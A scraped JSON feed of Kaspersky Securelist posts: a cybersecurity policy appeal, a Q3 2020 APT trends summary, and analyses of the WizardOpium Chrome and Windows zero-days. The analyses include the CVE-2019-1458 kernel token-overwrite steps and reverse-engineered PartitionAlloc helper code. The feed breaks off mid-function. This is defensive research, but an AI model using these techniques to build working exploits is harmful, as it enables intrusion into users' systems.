strongly believe that the points we have raised are obstructing a common path to cybersecurity. Furthermore, we are pleased to note that most of our hypothesis and beliefs are actually shared with many others, as demonstrated in 2020 [Paris Call](<https://pariscall.international/>) consultation [key takeaways](<https://www.kaspersky.com/about/policy-blog/general-cybersecurity/supporting-paris-call>), or [the latest reports](<https://front.un-arm.org/wp-content/uploads/2020/05/200527-oewg-ict-revised-pre-draft.pdf>) from the UN's [OEWG](<https://www.un.org/disarmament/open-ended-working-group/>) on "developments in the field of information and telecommunications in the context of international security", to which [Kaspersky](<https://front.un-arm.org/wp-content/uploads/2020/03/kaspersky-position-paper-on-oewg-first-pre-draft-report.pdf>) [contributed](<https://front.un-arm.org/wp-content/uploads/2020/06/kaspersky-position-paper-on-oewg-second-pre-draft-report-11-june-2020.pdf>).\n\nWe feel it is now a good time to send a** call to all governments and international bodies** (and ultimately any citizen) **that aim for a safer world: we urge you to demonstrate more willpower, and a more determined approach to cybersecurity**, by tackling the exposed causes of failure. We ask you to cooperatively choose the long-term peace of our common digital assets, over short-term nationalistic or private interests. We do our part, and we want our expert efforts to be transformed and developed further. We hope for a safer world, and a long-standing peaceful common digital space. We will never achieve this without determined leadership and a global change towards a better common behavior.\n\n### A cooperative and global governing instrument\n\nWe need strong political and technological leaders to drive governments and international bodies towards a cooperative, determined and fast-paced road to cybersecurity. In order to continuously rationalize efforts, share insights and thoughts, enable regulation, control and take global measures, we need them to build a dedicated, strong, permanent and focused international instrument.\n\nWe believe that such an instrument could be hosted by the UN, should seek to tackle the causes of the failures that we exposed, and should help governments to enforce regulations and cooperatively take measures when they are needed.\n\nIn order to ensure a cooperative approach by design, to consider the whole spectrum of what is at stake, and to truly take the transnational nature of cyberspace into consideration, we believe that such an instrument should guarantee a continuous dialogue with representatives of governments, the private sector, civil society and the technical community. This would enable the creation of cooperative task forces that would provide broad cybersecurity expertise and assessments on various matters, including preventive and protective cybersecurity measures, vulnerability research, incident response, attribution, regulation, law enforcement, security and risk assessment of modern technologies, and cyber capacity building. It would also ensure that most findings are shared across nations and among cybersecurity players.\n\nThis governing instrument should also be able to build norms and regulations, and a cooperative approach to control the attribution of cyberattacks and sanctions against non-compliant behavior or crime, risk analysis, capacity building, and education for cybersecurity.\n\n### A binding treaty of responsible behavior in cyberspace\n\nNearly [two decades ago](<https://undocs.org/A/RES/58/32>), the UN started to task groups of government experts ([GGE](<https://www.un.org/disarmament/group-of-governmental-experts/>)) to anticipate international security developments in the field of IT, and to advance responsible state behavior in cyberspace. One of the most notable outcomes, despite GGE's debatable results and [limited reach](<https://www.ecfr.eu/article/commentary_time_to_fall_forward_on_cyber_governance>), is the definition of [13 principles](<https://undocs.org/A/RES/73/27>) that constitute the norms of responsible behavior in cyberspace. But after more than a decade, these principles are non-binding, apply to governments only, and have only been endorsed on a [voluntary basis](<https://undocs.org/A/70/174>). We believe this is not enough, and that it may reflect the lack of willpower and commitment from our governing leaders to cybersecurity.\n\nWe believe that the norms for responsible behavior in cyberspace should be further developed together with guidance on how these norms should be implemented, be better at including non-state actors such as the private sector, civil society and the technical community. After that they should become binding for the international community \u2013 if they remain voluntary, why should the bad guys care?\n\nAs far as private companies are concerned, the norm could set transparency and ethics baselines. We must not fail to mention [Kaspersky's own Global Transparency Initiative](<https://www.kaspersky.com/about/transparency>), which we truly believe to be a good source of inspiration for setting a number of private sector norms. This includes (but is not limited to) independent reviews of processes, security controls and software code, relocation of data processing, as well as the ability for trusted partners, customers and government stakeholders to directly access and check software code or threat detection rules. A code of ethics or ethics principles, from [the "FIRST" international CSIRTs community](<https://www.first.org/global/sigs/ethics/>) or from [Kaspersky](<https://www.kaspersky.com/blog/vulnerability-disclosure-ethics/35581/>), that tackle the responsible disclosure of security vulnerabilities, could also be leveraged as inspiration for private company norms.\n\n### Global regulations and shared means for cybersecurity\n\nIn order to tackle residual double-dealing issues and regulation needs that we exposed in our hypotheses, the global governing instrument or guidance should build and support further common regulations, on top of the previously mentioned norms of behavior. Such global regulations would ensure a consistent baseline of security requirements, to prevent proliferation of cyberweapons, prevent and firmly condemn cyberattacks, implement cybersecurity controls, foster responsibility and facilitate cooperation. How, where, and under which terms this governing instrument or guidance can be established should be a discussion for both state and non-state actors to ensure that we all fully recognize our responsibility to keep the digital space secure.\n\n## Conclusion\n\nWe deal with cyberattacks of all kinds every day and monitor their context from various sources. Over the years, we have seen more and more malicious activities from more and more actors, but global cybersecurity has reached a ceiling, and it appears that the potential for cyber-based conflicts is still growing. During the COVID-19 pandemic we [have once again observed](<https://front.un-arm.org/wp-content/uploads/2020/06/kaspersky-annex-on-cyber-threat-landscape-during-covid-19-pandemic-11-june-2020.pdf>) just how vital information technologies and digital assets are to democracy, the economy, the development of society, security and entertainment.\n\nWe believe that now is still a good time for world leaders, international and regional organizations, the private sector, the technical community and civil society to collaborate on achieving long-term peace in cyberspace rather than focusing on the short-term interests of individual countries or private organizations.", "modified": "2020-12-07T10:00:53", "published": "2020-12-07T10:00:53", "id": "SECURELIST:5CA08A4E968A3A57A891B8DC568EBF97", "href": "https://securelist.com/researchers-call-for-a-determined-path-to-cybersecurity/99708/", "type": "securelist", "title": "Researchers call for a determined path to cybersecurity", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-12T11:22:50", "bulletinFamily": "blog", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "\n\nIn November 2019, Kaspersky technologies [successfully detected](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) a Google Chrome 0-day exploit that was used in Operation WizardOpium attacks. During our investigation, we discovered that yet another 0-day exploit was used in those attacks. The exploit for Google Chrome embeds a 0-day EoP exploit (CVE-2019-1458) that is used to gain higher privileges on the infected machine as well as escaping the Chrome process sandbox. The exploit is very similar to those developed by the prolific 0-day developer known as 'Volodya'.\n\nThe EoP exploit consists of two stages: a tiny PE loader and the actual exploit. After achieving a read/write primitive in the renderer process of the browser through vulnerable JS code, the PE exploit corrupts some pointers in memory to redirect code execution to the PE loader. This is done to bypass sandbox restrictions because the PE exploit cannot simply start a new process using native WinAPI functions.\n\nThe PE loader locates an embedded DLL file with the actual exploit and repeats the same process as the native Windows PE loader \u2013 parsing PE headers, handling imports/exports, etc. After that, a code execution is redirected to the entry point of the DLL \u2013 the DllEntryPoint function. The PE code then creates a new thread, which is an entry point for the exploit itself, and the main thread simply waits until it stops.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134554/windows_0day_wizardopium_01.png>)\n\n_EoP exploit used in the attack_\n\nThe PE file encapsulating this EoP exploit has the following header:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134603/windows_0day_wizardopium_02.png>)\n\nThe compilation timestamp of Wed Jul 10 00:50:48 2019 is different from the other binaries, indicating it has been in use for some time.\n\nOur detailed analysis of the EoP exploit revealed that the vulnerability it used belongs to the win32k.sys driver and that the EoP exploit was the 0-day exploit because it works on the latest (patched) versions of Windows 7 and even on a few builds of Windows 10 (new Windows 10 builds are not affected because they implement measures that prevent the normal usage of the exploitable code).\n\nThe vulnerability itself is related to windows switching functionality (for example, the one triggered using the Alt-Tab key combination). That's why the exploit's code uses a few WinAPI calls (GetKeyState/SetKeyState) to emulate a key press operation.\n\nAt the beginning, the exploit tries to find the operating system version using ntdll.dll's RtlGetVersion call that's used to find a dozen offsets needed to set up fake kernel GDI objects in the memory. At the same time, it tries to leak a few kernel pointers using well-known techniques to leak kernel memory addresses (gSharedInfo, PEB's GdiSharedHandleTable). After that, it tries to create a special memory layout with holes in the heap using many calls to CreateAcceleratorTable/DestroyAcceleratorTable. Then a bunch of calls to CreateBitmap are performed, the addresses to which are leaked using a handle table array.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134611/windows_0day_wizardopium_03.png>)\n\n_Triggering exploitable code path_\n\nAfter that, a few pop-up windows are created and an undocumented syscall NtUserMessageCall is called using their window handles. In addition, it creates a special window with the class of a task switch window (#32771) and it's important to trigger an exploitable code path in the driver. At this step the exploit tries to emulate the Alt key and then using a call to SetBitmapBits it crafts a GDI object which contains a controllable pointer value that is used later in the kernel driver's code (win32k!DrawSwitchWndHilite) after the exploit issues a second undocumented call to the syscall (NtUserMessageCall). That's how it gets an arbitrary kernel read/write primitive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134616/windows_0day_wizardopium_04.png>)\n\n_Achieving primitives needed to get arbitrary R/W_\n\nThis primitive is then used to perform privilege escalation on the target system. It's done by overwriting a token in the EPROCESS structure of the current process using the token value for an existing system driver process.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134620/windows_0day_wizardopium_05.png>)\n\n_Overwriting EPROCESS token structure_\n\nKaspersky products detect this exploit with the verdict PDM:Exploit.Win32.Generic. \nThese kinds of threats can also be detected with our Sandbox technology. This detection component is a part of our KATA and [Kaspersky Sandbox](<https://media.kaspersky.com/en/business-security/enterprise/Kaspersky-Sandbox-product-brief-en.pdf>) products. In this particular attack sandbox solution can analyze URL/malicious payload in isolated environment and detect the EPROCESS token manipulation.", "modified": "2019-12-10T20:00:39", "published": "2019-12-10T20:00:39", "id": "SECURELIST:4F6413DE862444B5FA0B192AF22A042D", "href": "https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/", "type": "securelist", "title": "Windows 0-day exploit CVE-2019-1458 used in Operation WizardOpium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-04T08:16:24", "bulletinFamily": "blog", "cvelist": ["CVE-2017-1182", "CVE-2019-13720", "CVE-2019-1458", "CVE-2020-0986", "CVE-2020-1380"], "description": "\n\nFor more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q3 2020.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nWe have already partly documented the activities of DeathStalker, a unique threat group that seems to focus mainly on law firms and companies operating in the financial sector. The group's interest in gathering sensitive business information leads us to believe that DeathStalker is a group of mercenaries offering hacking-for-hire services, or acting as an information broker in financial circles. The activities of this threat actor first came to our attention through a PowerShell-based implant called Powersing. This quarter, we unraveled the threads of DeathStalker's LNK-based Powersing intrusion workflow. While there is nothing groundbreaking in the whole toolset, we believe defenders can gain a lot of value by understanding the underpinnings of a modern, albeit low-tech, infection chain used by a successful threat actor. DeathStalker continues to develop and use this implant, using tactics that have mostly been identical since 2018, while making greater efforts to evade detection. In August, our [public report of DeathStalker's activities](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) summarized the three scripting language-based toolchains used by the group \u2013 Powersing, Janicab and Evilnum.\n\nFollowing our initial private report on Evilnum, we detected a new batch of implants in late June 2020, showing interesting changes in the (so far) quite static modus operandi of DeathStalker. For instance, the malware directly connects to a C2 server using an embedded IP address or domain name, as opposed to previous variants where it made use of at least two dead drop resolvers (DDRs) or web services, such as forums and code sharing platforms, to fetch the real C2 IP address or domain. Interestingly, for this campaign the attackers didn't limit themselves merely to sending spear-phishing emails but actively engaged victims through multiple emails, persuading them to open the decoy, to increase the chance of compromise. Furthermore, aside from using Python-based implants throughout the intrusion cycle, in both new and old variants, this was the first time that we had seen the actor dropping PE binaries as intermediate stages to load Evilnum, while using advanced techniques to evade and bypass security products.\n\nWe also found another intricate, low-tech implant that we attribute to DeathStalker with medium confidence. The delivery workflow uses a Microsoft Word document and drops a previously unknown PowerShell implant that relies on DNS over HTTPS (DoH) as a C2 channel. We dubbed this implant PowerPepper.\n\nDuring a recent investigation of a targeted campaign, we found a UEFI firmware image containing rogue components that drop previously unknown malware to disk. Our analysis showed that the revealed firmware modules were based on a known bootkit named Vector-EDK, and the dropped malware is a downloader for further components. By pivoting on unique traits of the malware, we uncovered a range of similar samples from our telemetry that have been used against diplomatic targets since 2017 and have different infection vectors. While the business logic of most is identical, we could see that some had additional features or differed in implementation. Due to this, we infer that the bulk of samples originate from a bigger framework that we have dubbed [MosaicRegressor](<https://securelist.com/mosaicregressor/98849/>). Code artefacts in some of the framework's components, and overlaps in C2 infrastructure used during the campaign, suggest that a Chinese-speaking actor is behind these attacks, possibly one that has connections to groups using the Winnti backdoor. The targets, diplomatic institutions and NGOs in Asia, Europe and Africa, all appear to be connected in some way to North Korea.\n\n## Europe\n\nSince publishing our initial report on WellMess (see our [_APT trends report Q2 2020_](<https://securelist.com/apt-trends-report-q2-2020/97937/>)), the UK National Cyber Security Centre (NCSC) has released a joint technical advisory, along with Canadian and US governments, on the most recent activity involving WellMess. Specifically, all three governments attribute the use of this malware targeting COVID-19 vaccine research to The Dukes (aka APT29 and Cozy Bear). The advisory also details two other pieces of malware, SOREFANG and WellMail, that were used during this activity. Given the direct public statement on attribution, new details provided in the advisory, as well as new information discovered since our initial investigation, we published our report to serve as a supplement to our previous reporting on this threat actor. While the publication of the NCSC advisory has increased general public awareness on the malware used in these recent attacks, the attribution statements made by all three governments provided no clear evidence for other researchers to pivot on for confirmation. For this reason, we are currently unable to modify our original statement; and we still assess that the WellMess activity has been conducted by a previously unknown threat actor. We will continue to monitor for new activity and adjust this statement in the future if new evidence is uncovered.\n\n## Russian-speaking activity\n\nIn summer, we uncovered a previously unknown multimodule C++ toolset used in highly targeted industrial espionage attacks dating back to 2018. So far, we have seen no similarities with known malicious activity regarding code, infrastructure or TTPs. To date, we consider this toolset and the actor behind it to be new. The malware authors named the toolset MT3, and based on this abbreviation we have named the toolset [MontysThree](<https://securelist.com/montysthree-industrial-espionage/98972/>). The malware is configured to search for specific document types, including those stored on removable media. It contains natural language artefacts of correct Russian and a configuration that seek directories that exist only in Cyrilic version of Windows, while presenting some false flag artefacts suggesting a Chinese-speaking origin. The malware uses legitimate cloud services such as Google, Microsoft and Dropbox for C2 communications.\n\n## Chinese-speaking activity\n\nEarlier this year, we discovered an active and previously unknown stealthy implant dubbed Moriya in the networks of regional inter-governmental organizations in Asia and Africa. This tool was used to control public facing servers in those organizations by establishing a covert channel with a C2 server and passing shell commands and their outputs to the C2. This capability is facilitated using a Windows kernel mode driver. Use of the tool is part of an ongoing campaign that we have named TunnelSnake. The rootkit was detected on the targeted machines in May, with activity dating back as early as November 2019, persisting in networks for several months following the initial infection. We found another tool showing significant code overlaps with this rootkit, suggesting that the developers have been active since at least 2018. Since neither rootkit nor other lateral movement tools that accompanied it during the campaign relied on hard-coded C2 servers, we could gain only partial visibility into the attacker's infrastructure. That said, the bulk of detected tools, apart from Moriya, consisted of both proprietary and well-known pieces of malware that were previously used by Chinese-speaking threat actors, giving a clue to the attacker's origin.\n\nPlugX continues to be effectively and heavily used across Southeast and East Asia, and also Africa, with some minimal use in Europe. The PlugX codebase has been in use by multiple Chinese-speaking APT groups, including HoneyMyte, Cycldek and LuckyMouse. Government agencies, NGOs and IT service organizations seem to be consistent targets. While the new USB spreading capability is opportunistically pushing the malware throughout networks, compromised MSSPs/IT service organizations appear to be a potential vector of targeted delivery, with CobaltStrike installer packages pushed to multiple systems for initial PlugX installation. Based on our visibility, the majority of activity in the last quarter appears to be in Mongolia, Vietnam and Myanmar. The number of systems in these countries dealing with PlugX in 2020 is at the very least in the thousands.\n\nWe discovered an ongoing campaign, dating back to May, utilizing a new version of the Okrum backdoor, attributed to Ke3chang. This updated version of Okrum uses an Authenticode-signed Windows Defender binary using a unique side-loading technique. The attackers used steganography to conceal the main payload in the Defender executable while keeping its digital signature valid, reducing the chance of detection. We haven't previously seen this method being used in the wild for malicious purposes. We have observed one affected victim, a telecoms company located in Europe.\n\nOn September 16, the [US Department of Justice released three indictments associated with hackers allegedly connected with APT41](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>) and other intrusion sets tracked as Barium, Winnti, Wicked Panda and Wicked Spider. In addition, two Malaysian nationals were also arrested on September 14, in Sitiawan (Malaysia), for "conspiring to profit from computer intrusions targeting the video game industry", following cooperation between the US DoJ and the Malaysian government, including the Attorney General's Chambers of Malaysia and the Royal Malaysia Police. The first indictment alleges that the defendants set up an elite "white hat" network security company, called Chengdu 404 Network Technology Co, Ltd. (aka Chengdu Si Lingsi Network Technology Co., Ltd.), and under its guise, engaged in computer intrusions targeting hundreds of companies around the world. According to the indictment, they "carried out their hacking using specialized malware, such as malware that cyber-security experts named 'PlugX/Fast', 'Winnti/Pasteboy', 'Shadowpad', 'Barlaiy/Poison Plug' and 'Crosswalk/ProxIP'". The indictments contain several indirect IoCs, which allowed us to connect these intrusions to Operation ShadowPad and Operation ShadowHammer, two massive supply-chain attacks discovered and investigated by Kaspersky in recent years.\n\n## Middle East\n\nIn June, we observed new activity by the MuddyWater APT group, involving use of a new set of tools that constitute a multistage framework for loading malware modules. Some components of the framework leverage code to communicate with C2s identical to code we observed in the MoriAgent malware earlier this year. For this reason, we decided to dub the new framework MementoMori. The purpose of the new framework is to facilitate execution of further in-memory PowerShell or DLL modules. We detected high-profile victims based in Turkey, Egypt and Azerbaijan.\n\n## Southeast Asia and Korean Peninsula\n\nIn May, we found new samples belonging to the Dtrack family. The first sample, named Valefor, is an updated version of the Dtrack RAT containing a new feature enabling the attacker to execute more types of payload. The second sample is a keylogger called Camio which is an updated version of its keylogger. This new version updates the logged information and its storage mechanism. We observed signs indicating that these malware programs were tailored for specific victims. At the time of our research our telemetry revealed victims located in Japan.\n\nWe have been tracking LODEINFO, fileless malware used in targeted attacks since last December. During this time, we observed several versions as the authors were developing the malware. In May, we detected version v0.3.6 targeting diplomatic organizations located in Japan. Shortly after that, we detected v0.3.8 as well. Our investigation revealed how the attackers operate during the lateral movement stage: after obtaining the desired data, the attackers wipe their traces. Our private report included a technical analysis of the LODEINFO malware and the attack sequence in the victim's network, to disclose the actor's tactics and methods.\n\nWhile tracking Transparent Tribe activity, we discovered an interesting tool used by this APT threat actor: the server component used to manage CrimsonRAT bots. We found different versions of this software, allowing us to look at the malware from the perspective of the attackers. It shows that the main purpose of this tool is file stealing, given its functionalities for exploring the remote file system and collecting files using specific filters. Transparent Tribe (aka PROJECTM and MYTHIC LEOPARD) is a very prolific APT group that has increased its activities in recent months. We reported [the launch of a new wide-ranging campaign that uses the CrimsonRAT tool](<https://securelist.com/transparent-tribe-part-1/98127/>) where we were able to set up and analyze the server component and saw the use of the USBWorm component for the first time; we also found [an Android implant used to target military personnel in India](<https://securelist.com/transparent-tribe-part-2/98233/>). This discovery also confirms much of the information already discovered during previous investigations; and it also confirms that CrimsonRAT is still under active development.\n\nIn April, we discovered a new malware strain that we named CRAT, based on the build path and internal file name. The malware was spread using a weaponized Hangul document as well as a Trojanized application and strategic web compromise. Since its discovery the full-featured backdoor has quickly evolved, diversifying into several components. A downloader delivers CRAT to profile victims, followed by next-stage orchestrator malware named SecondCrat: this orchestrator loads various plugins for espionage, including keylogging, screen capturing and clipboard stealing. During our investigation, we found several weak connections with ScarCruft and Lazarus: we discovered that several debugging messages inside the malware have similar patterns to ScarCruft malware, as well as some code patterns and the naming of the Lazarus C2 infrastructure.\n\nIn June, we observed a new set of malicious Android downloaders which, according to our telemetry, have been actively used in the wild since at least December 2019; and have been used in a campaign targeting victims almost exclusively in Pakistan. Its authors used the Kotlin programming language and Firebase messaging system for the downloader, which mimics Chat Lite, Kashmir News Service and other legitimate regional Android applications. A report by the National Telecom & Information Technology Security Board (NTISB) from January describes malware sharing the same C2s and spoofing the same legitimate apps. According to this publication, targets were Pakistani military bodies, and the attackers used WhatsApp messages, SMS, emails and social media as the initial infection vectors. Our own telemetry shows that this malware also spreads through Telegram messenger. The analysis of the initial set of downloaders allowed us to find an additional set of Trojans that we believe are strongly related, as they use the package name mentioned in the downloaders and focus on the same targets. These new samples have strong code similarity with artefacts previously attributed to Origami Elephant.\n\nIn mid-July, we observed a Southeast Asian government organization targeted by an unknown threat actor with a malicious ZIP package containing a multilayered malicious RAR executable package. In one of the incidents, the package was themed around COVID-19 containment. We believe that the same organization was probably the same target of a government web server watering-hole, compromised in early July and serving a highly similar malicious LNK. Much like other campaigns against particular countries that we have seen in the past, these adversaries are taking a long-term, multipronged approach to compromising target systems without utilizing zero-day exploits. Notably, another group (probably OceanLotus) used a similar Telegram delivery technique with its malware implants against the same government targets within a month or so of the COVID-19-themed malicious LNK, in addition to its use of Cobalt Strike.\n\nIn May 2020, Kaspersky technologies prevented an attack using a malicious script for Internet Explorer against a South Korean company. Closer analysis revealed that the attack used a previously unknown full chain that consisted of two zero-day exploits: a Remote Code Execution exploit for Internet Explorer and an Elevation of Privilege exploit for Windows. Unlike a previous full chain that we discovered, used in Operation WizardOpium (you can read more [here ](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>)and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), the new full chain targeted the latest builds of Windows 10, and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build 18363 x64. On June 8, we reported our discoveries to Microsoft, who confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for vulnerability CVE-2020-0986 that was used in the zero-day Elevation of Privilege exploit; but before our discovery, the exploitability of this vulnerability had been considered less likely. The patch for CVE-2020-0986 was released on June 9. Microsoft assigned CVE-2020-1380 to a use-after-free vulnerability in JScript and the patch for this was released on August 11. We are calling this and related attacks [Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). Currently, we are unable to establish a definitive link with any known threat actor, but due to similarities with previously discovered exploits we believe that DarkHotel may be behind this attack.\n\nOn July 22, we came across a suspicious archive file that was uploaded to VirusTotal from an Italian source. The file seemed to be a triage consisting of malicious scripts, access logs, malicious document files and several screenshots related to suspicious file detections from security solutions. After looking into these malicious document files, we identified that they are related to a Lazarus group campaign that we reported in June. This campaign, dubbed DeathNote, targeted the automobile industry and individuals in the academic field using lure documents containing aerospace and defense-related job descriptions. We are confident that these documents are related to a recently reported attack on an Israeli defense company. We have uncovered webshell scripts, C2 server scripts and malicious documents, identified several victims connected to the compromised C2 server, as well as uncovering the method used to access the C2 server.\n\nWe have observed an ongoing Sidewinder campaign that started in February, using five different malware types. The group made changes to its final payloads and continues to target government, diplomatic and military entities using current themes, such as COVID-19, in its spear-phishing efforts. While the infection mechanism remains the same as before, including the group's exploit of choice (CVE-2017-1182) and use of the DotNetToJScript tool to deploy the final payloads, we found that the actor also used ZIP archives containing a Microsoft compiled HTML Help file to download the last-stage payload. In addition to the existing .NET-based implant, which we call SystemApp, the threat actor added JS Orchestrator, the Rover/Scout backdoor and modified versions of AsyncRAT, warzoneRAT to its arsenal.\n\n## Other interesting discoveries\n\nAttribution is difficult at the best of times, and sometimes it's not possible at all. While investigating an ongoing campaign, we discovered a new Android implant undergoing development, with no clear link to any previously known Android malware. The malware is able to monitor and steal call logs, SMS, audio, video and non-media files, as well as identifying information about the infected device. It also implements an interesting feature to collect information on network routes and topology obtained using the "traceroute" command as well as using local ARP caches. During this investigation we uncovered a cluster of similar Android infostealer implants, with one example being obfuscated. We also found older Android malware that more closely resembles a backdoor, with traces of it in the wild dating back to August 2019.\n\nIn April, Cisco Talos described the activities of an unknown actor targeting Azerbaijan's government and energy sector using new malware called PoetRAT. In collaboration with Kaspersky ICS CERT, we identified supplementary samples of associated malware and documents with broader targeting of multiple universities, government and industrial organizations as well as entities in the energy sector in Azerbaijan. The campaign started in early November 2019; and the attackers switched off the infrastructure immediately following publication of the Cisco Talos report. We observed a small overlap in victimology with Turla, but since there is no technically sound proof of relation between them, and we haven't been able to attribute this new set of activity to any other previously known actor, we named it Obsidian Gargoyle.\n\n## Final thoughts\n\nThe TTPs of some threat actors remain fairly consistent over time (such as using hot topics such (COVID-19) to entice users to download and execute malicious attachments sent in spear-phishing emails), while other groups reinvent themselves, developing new toolsets and widening their scope of activities, for example, to include new platforms. And while some threat actors develop [very sophisticated tools](<https://securelist.com/mosaicregressor/98849/>), for example, MosiacRegressor UEFI implant, others [have great success](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) with basic TTPs. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we've seen in Q3 2020:\n\n * Geo-politics continues to drive the development of many APT campaigns, as seen in recent months in the activities of Transparent Tribe, Sidewinder, Origami Elephant and MosaicRegressor, and in the 'naming and shaming' of various threat actors by the NCSC and the US Department of Justice.\n * Organizations in the financial sector also continue to attract attention: the activities of the mercenary group DeathStalker is a recent example.\n * We continue to observe the use of mobile implants in APT attacks with recent examples including Transparent Tribe and Origami Elephant.\n * While APT threat actors remain active across the globe, recent hotspots of activity have been Southeast Asia, the Middle East and various regions affected by the activities of Chinese-speaking APT groups.\n * Unsurprisingly, we continue to see COVID-19-themed attacks \u2013 this quarter they included WellMess and Sidewinder.\n * Among the most interesting APT campaigns this quarter were DeathStalker and MosaicRegressor: the former underlining the fact that APT groups can achieve their aims without developing highly sophisticated tools; the latter representing the leading-edge in malware development.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "modified": "2020-11-03T10:00:37", "published": "2020-11-03T10:00:37", "id": "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C", "href": "https://securelist.com/apt-trends-report-q3-2020/99204/", "type": "securelist", "title": "APT trends report Q3 2020", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-29T22:19:56", "bulletinFamily": "blog", "cvelist": ["CVE-2010-2744", "CVE-2016-7255", "CVE-2019-0859", "CVE-2019-13720", "CVE-2019-1458"], "description": "\n\nBack in October 2019 we detected a classic watering-hole attack on a North Korea-related news site that exploited a chain of Google Chrome and Microsoft Windows zero-days. While we've already published blog posts briefly describing this operation (available [here](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), in this blog post we'd like to take a deep technical dive into the exploits and vulnerabilities used in this attack.\n\n## Google Chrome remote code execution exploit\n\nIn the [original blog post](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) we described the exploit loader responsible for initial validation of the target and execution of the next stage JavaScript code containing the full browser exploit. The exploit is huge because, besides code, it contains byte arrays with shellcode, a Portable Executable (PE) file and WebAssembly (WASM) module used in the later stages of exploitation. The exploit abused a vulnerability in the WebAudio OfflineAudioContext interface and was targeting two release builds of Google Chrome 76.0.3809.87 and 77.0.3865.75. However, the vulnerability was introduced long before that and much earlier releases with a WebAudio component are also vulnerable. At the time of our discovery the current version of Google Chrome was 78, and while this version was also affected, the exploit did not support it and had a number of checks to ensure that it would only be executed on affected versions to prevent crashes. After our report, the vulnerability was assigned CVE-2019-13720 and was fixed in version 78.0.3904.87 with the following [commit](<https://chromium.googlesource.com/chromium/src.git/+/6a2e670a243b815cf043f8da4d26ecb9a64d307b>). A use-after-free (UAF) vulnerability, it could be triggered due to a race condition between the Render and Audio threads:\n \n \n if (!buffer) {\n +\tBaseAudioContext::GraphAutoLocker context_locker(Context());\n +\tMutexLocker locker(process_lock_);\n \treverb_.reset();\n \tshared_buffer_ = nullptr;\n \treturn;\n\nAs you can see, when the audio buffer is set to null in ConvolverNode and an active buffer already exists within the Reverb object, the function SetBuffer() can destroy reverb_ and shared_buffer_ objects.\n \n \n class MODULES_EXPORT ConvolverHandler final : public AudioHandler {\n ...\n std::unique_ptr<Reverb> reverb_;\n std::unique_ptr<SharedAudioBuffer> shared_buffer_;\n ...\n\nThese objects might still be in use by the Render thread because there is no proper synchronization between the two threads in the code. A patch added two missing locks (graph lock and process lock) for when the buffer is nullified.\n\nThe exploit code was obfuscated, but we were able to fully reverse engineer it and reveal all the small details. By looking at the code, we can see the author of the exploit has excellent knowledge of the internals of specific Google Chrome components, especially the [PartitionAlloc](<https://github.com/scrapy/base-chromium/blob/master/allocator/partition_allocator/PartitionAlloc.md>) memory allocator. This can clearly be seen from the snippets of reverse engineered code below. These functions are used in the exploit to retrieve useful information from internal structures of the allocator, including: SuperPage address, PartitionPage address by index inside the SuperPage, the index of the used PartitionPage and the address of PartitionPage metadata. All constants are taken from [partition_alloc_constants.h](<https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/partition_alloc_constants.h>):\n \n \n function getSuperPageBase(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet superPageBaseMask = ~superPageOffsetMask;\n \tlet superPageBase = addr & superPageBaseMask;\n \treturn superPageBase;\n }\n \n function getPartitionPageBaseWithinSuperPage(addr, partitionPageIndex) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet partitionPageBase = partitionPageIndex << BigInt(14);\n \tlet finalAddr = superPageBase + partitionPageBase;\n \treturn finalAddr;\n }\n \n function getPartitionPageIndex(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \treturn partitionPageIndex;\n }\n \n function getMetadataAreaBaseFromPartitionSuperPage(addr) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet systemPageSize = BigInt(0x1000);\n \treturn superPageBase + systemPageSize;\n }\n \n function 